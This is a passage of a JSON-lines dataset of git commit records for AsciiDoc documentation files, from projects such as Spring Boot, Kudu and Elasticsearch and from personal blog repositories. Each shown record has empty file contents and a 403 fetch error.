2015-03-15-NEW-J5-Breakout-Board.adoc","repos":"modmaker\/modmaker.github.io,modmaker\/modmaker.github.io,modmaker\/modmaker.github.io","old_file":"_posts\/2015-03-15-NEW-J5-Breakout-Board.adoc","new_file":"_posts\/2015-03-15-NEW-J5-Breakout-Board.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/modmaker\/modmaker.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc4065c8635c3acdfceebbc5aedceeb8736cc52","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c1efa473e73802fb9cd86616b16d41c1ec1dce3","subject":"Update documentation on how to configure the main class with Gradle","message":"Update documentation on how to configure the main class with Gradle\n\nIn 1.3, our Gradle plugin no longer automatically applies the\napplication plugin. This affects the default options that are\navailable for explicitly configuring a project's main class. This\ncommit updates the documentation accordingly.\n\nCloses gh-3768\n","repos":"yhj630520\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,felipeg48\/spring-boot,olivergierke\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,hello2009chen\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot,minmay\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,spring-projects\/spring-boot,lburgazzoli\/spring-boot,RichardCSantana\/spring-boot,shakuzen\/spring-boot,javyzheng\/spring-boot,DeezCashews\/spring-boot,bijukunjummen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,vpavic\/spring-boot,lucassaldanha\/spring-boot,herau\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,lexandro\/spring-boot,dreis2211\/spring-boot,neo4j-contrib\/spring-boot,joshthornhill\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,Nowheresly\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,yhj630520\/spring-boot,thomasdarimont\/spring-boot,bijukunjummen\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,jvz\/spring-boot,dfa1\/spring-boot,jmnarloch\/spring-boot,kdvolder\/spring-boot,jayarampradhan\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,mbogoevici\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPSDemo,linead\/spring-boot,qerub\/spring-boot,lenicliu\/spring-boot,joshthornhill\/spring-boot,felipeg48\/spring-boot,felipeg48\/spring-boot,lucassaldanha\/spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,nebhale\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot-concourse,donhuvy\/spring-boot,dreis2211\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,yhj630520\/spring-boot,jmnarloch\/spring-boot,Nowheresly\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,ameraljovic\/spring-boot,dfa1\/spring-boot,jbovet\/spring-boot,zhangshuangquan\/spring-root,ollie314\/spring-boot,vakninr\/spring-boot,cleverjava\/jenkins2-course-spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,nebhale\/spring-boot,i007422\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,ilayaperumalg\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,shangyi0102\/spring-boot,scottfrederick\/spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,dfa1\/spring-boot,ilayaperumalg\/spring-boot,brettwooldridge\/spring-boot,neo4j-contrib\/spring-boot,joshthornhill\/spring-boot,ihoneymon\/spring-boot,ameraljovic\/spring-boot,lexandro\/spring-boot,mbogoevici\/spring-boot,joansmith\/spring-boot,bbrouwer\/spring-boot,sbcoba\/spring-boot,mbenson\/spring-boot,izeye\/spring-boot,aahlenst\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,eddumelendez\/spring-boot,jxblum\/spring-boot,Buzzardo\/spring-boot,jvz\/spring-boot,izeye\/spring-boot,RichardCSantana\/spring-boot,vakninr\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshiste\/spring-boot,mbogoevici\/spring-boot,eddumelendez\/spring-boot,bbrouwer\/spring-boot,ollie314\/spring-boot,dreis2211\/spring-boot,qerub\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,neo4j-contrib\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,ameraljovic\/spring-boot,xiaoleiPENG\/my-project,joansmith\/spring-boot,drumonii\/spring-boot,neo4j-contrib\/spring-boot,cleverjava\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,joansmith\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lenicliu\/spring-boot,qerub\/spring-boot,lburgazzoli\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,i007422\/jenkins2-course-spring-boot,lenicliu\/spring-boot,joshthornhill\/spring-boot,sebastiankirsch\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kdvolder\/spring-boot,ihoneymon\/spring-boot,mrumpf\/spring-boot,kamilszymanski\/spring-boot,sebastiankirsch\/spring-boot,NetoDevel\/spring-boot,habuma\/spring-boot,ihoneymon\/spring-boot,ihoneymon\/spring-boot,tsachev\/spring-boot,RichardCSantana\/spring-boot,mrumpf\/spring-boot,deki\/spring-boot,shangyi0102\/spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,jmnarloch\/spring-boot,DeezCashews\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot-concourse,Nowheresly\/spring-boot,philwebb\/spring-boot-concourse,mrumpf\/spring-boot,pvorb\/spring-boot,brettwooldridge\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,afroje-reshma\/spring-boot-sample,ptahchiev\/spring-boot,wilkinsona\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,philwebb\/spring-boot-concourse,jbovet\/spring-boot,jmnarloch\/spring-boot,minmay\/spring-boot,sbuettner\/spring-boot,bjornlindstrom\/spring-boot,sbcoba\/spring-boot,jvz\/spring-boot,akmaharshi\/jenkins,michael-simons\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,candrews\/spring-boot,jbovet\/spring-boot,sbuettner\/spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,afroje-reshma\/spring-boot-sample,dreis2211\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,akmaharshi\/jenkins,kamilszymanski\/spring-boot,bclozel\/spring-boot,shangyi0102\/spring-boot,afroje-reshma\/spring-boot-sample,rweisleder\/spring-boot,tiarebalbi\/spring-boot,kamilszymanski\/spring-boot,olivergierke\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,sbuettner\/spring-boot,candrews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,minmay\/spring-boot,vpavic\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,minmay\/spring-boot,sbcoba\/spring-boot,felipeg48\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,lucassaldanha\/spring-boot,i007422\/jenkins2-course-spring-boot,deki\/spring-boot,zhangshuangquan\/spring-root,mosoft521\/spring-boot,dfa1\/spring-boot,jayarampradhan\/spring-boot,thomasdarimont\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,mbogoevici\/spring-boot,sbuettner\/spring-boot,mbenson\/spring-boot,tsachev\/spring-boot,ameraljovic\/spring-boot,akmaharshi\/jenkins,bbrouwer\/spring-boot,nebhale\/spring-boot,bjornlindstrom\/spring-boot,yangdd1205\/spring-boot,joshiste\/spring-boot,joshiste\/spring-boot,pvorb\/spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,kamilszymanski\/spring-boot,donhuvy\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,sbuettner\/spring-boot,nebhale\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,vpavic\/spring-boot,eddumelendez\/spring-boot,ptahchiev\/spring-boot,linead\/spring-boot,linead\/spring-boot,rweisleder\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,Buzzardo\/spring-boot,sebastiankirsch\/spring-boot,lenicliu\/spring-boot,thomasdarimont\/spring-boot,jvz\/spring-boot,mdeinum\/spring-boot,isopov\/spring-boot,olivergierke\/spring-boot,qerub\/spring-boot,ilayaperumalg\/spring-boot,vpavic\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,xiaoleiPENG\/my-project,philwebb\/spring-boot,jvz\/spring-boot,kdvolder\/spring-boot,joansmith\/spring-boot,RichardCSantana\/spring-boot,thomasdarimont\/spring-boot,vakninr\/spring-boot,yangdd1205\/spring-boot,aahlenst\/spring-boot,kdvolder\/spring-boot,herau\/spring-boot,xiaoleiPENG\/my-project,javyzheng\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,bjornlindstrom\/spring-boot,SaravananParthasarathy\/SPSDemo,rajendra-chola\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,izeye\/spring-boot,jbovet\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,hello2009chen\/spring-boot,bijukunjummen\/spring-boot,joshiste\/spring-boot,chrylis\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,aahlenst\/spring-boot,chrylis\/spring-boot,xiaoleiPENG\/my-project,zhanhb\/spring-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,herau\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,bijukunjummen\/spring-boot,mrumpf\/spring-boot,philwebb\/spring-boot-concourse,ollie314\/spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,tsachev\/spring-boot,kamilszymanski\/spring-boot,philwebb\/spring-boot,hqrt\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,bclozel\/spring-boot,wilkinsona\/spring-boot,dfa1\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPSDemo,donhuvy\/spring-boot,drumonii\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,royclarkson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,zhangshuangquan\/spring-root,htynkn\/spring-boot,NetoDevel\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,akmaharshi\/jenkins,felipeg48\/spring-boot,htynkn\/spring-boot,jayarampradhan\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,neo4j-contrib\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,michael-simons\/spring-boot,lucassaldanha\/spring-boot,rweisleder\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,rweisleder\/spring-boot,herau\/spring-boot,wilkinsona\/spring-boot,htynkn\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,brettwooldridge\/spring-boot,mosoft521\/spring-boot,bclozel\/spring-boot,bjornlindstrom\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,ollie314\/spring-boot,bclozel\/spring-boot,zhangshuangquan\/spring-root,donhuvy\/spring-boot,zhangshuangquan\/spring-root,habuma\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/build-tool-plugins.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/build-tool-plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc55bceee8eaaf853287769328815ff54445db5f","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a0f1177c5363a91fd67146cab76eab0c9527682","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"959c1a360fba51c5ce7458cd95878681f56baf98","subject":"update release notes","message":"update release notes\n","repos":"jboss-openshift\/application-templates,bparees\/application-templates,knrc\/application-templates,rnetuka\/application-templates,josefkarasek\/application-templates,errantepiphany\/application-templates,bdecoste\/application-templates,rcernich\/application-templates,kyguy\/application-templates,douglaspalmer\/application-templates","old_file":"docs\/release-notes.adoc","new_file":"docs\/release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9e3bd846d6d0403c688a8e7d178f31966a3bfd3","subject":"[docs] Add scaling guide","message":"[docs] Add scaling guide\n\nThis adds some more detailed information on how Kudu scales w.r.t\nseveral resources and provides some background on the scale limits\nand how to plan capacity for a Kudu deployment.\n\nChange-Id: I38d8999addc41fe0b726342a27dbba199ddf7dd2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8842\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/scaling_guide.adoc","new_file":"docs\/scaling_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e61224778f306d9dd4c9c5d9e67fe3cf7aef82a6","subject":"Fixed bad link","message":"Fixed bad link\n\nOriginal commit: elastic\/x-pack-elasticsearch@f7ab965eba51e07b7a2718344cd670bef4a7026b\n","repos":"nknize\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/en\/watcher\/example-watches\/example-watch-clusterstatus.asciidoc","new_file":"docs\/en\/watcher\/example-watches\/example-watch-clusterstatus.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d810742b6a44c627860045be67f489b45ab880e","subject":"add bdx.io slide","message":"add bdx.io slide\n","repos":"binout\/asciidoctor-quickie,binout\/asciidoctor-quickie,binout\/asciidoctor-quickie,binout\/asciidoctor-quickie,binout\/asciidoctor-quickie","old_file":"src\/main\/slides\/asciidoctor-bdx-io.adoc","new_file":"src\/main\/slides\/asciidoctor-bdx-io.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/asciidoctor-quickie.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c2d7623aa1d7b73bbd737e5c0ebf78b071dd36b","subject":"Add code climate badge","message":"Add code climate badge\n","repos":"archiloque\/external-memory,archiloque\/external-memory,archiloque\/external-memory","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/archiloque\/external-memory.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f881b1b6fdbffae3ff73574d2d4e246d2f911f0","subject":"Add a README file.","message":"Add a README file.\n\nIt is written in AsciiDoc because of its support for tables.\n","repos":"marcecj\/scons_faust","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcecj\/scons_faust.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26f64e041d170593bb64deee68a17b3e6c1bf5fe","subject":"Updated current job activities","message":"Updated current job activities\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"workhist.adoc","new_file":"workhist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11900ae4f6687badb88dba831e2a8dc82e12abca","subject":"initial","message":"initial","repos":"tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/StrafePingMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/StrafePingMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"51f9977417d754dbac2f50b78c015d9add9f35f3","subject":"Update 2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","message":"Update 2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","repos":"Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck","old_file":"_posts\/2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","new_file":"_posts\/2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lukas238\/the-holodeck.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"519b5460a63df0e85cf9144c40cbd98884478a3a","subject":"Update 2016-03-20-douleurs-extremes-atterrissage-avion.adoc","message":"Update 2016-03-20-douleurs-extremes-atterrissage-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6afa538eeb6fa1d29a1991699f1407c30e2a84a2","subject":"Update 2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","message":"Update 2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","new_file":"_posts\/2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ae11092d83fb3e443653dcf1401be72499d34b5","subject":"Update 2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","message":"Update 2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","new_file":"_posts\/2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08b76d95ca5a8d199e30400f2b7f4842a1345728","subject":"Update 2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","message":"Update 2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","new_file":"_posts\/2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d39f4c27ff8f6645e99800c036cd682fe5cab0b","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce57ac43e55ed4cc87d3177b16cfa2072f6cb75b","subject":"How to use Pandas with Hawkular-Metrics (#280)","message":"How to use Pandas with Hawkular-Metrics (#280)\n\n* How to use Pandas with Hawkular-Metrics\r\n\r\n* Fix 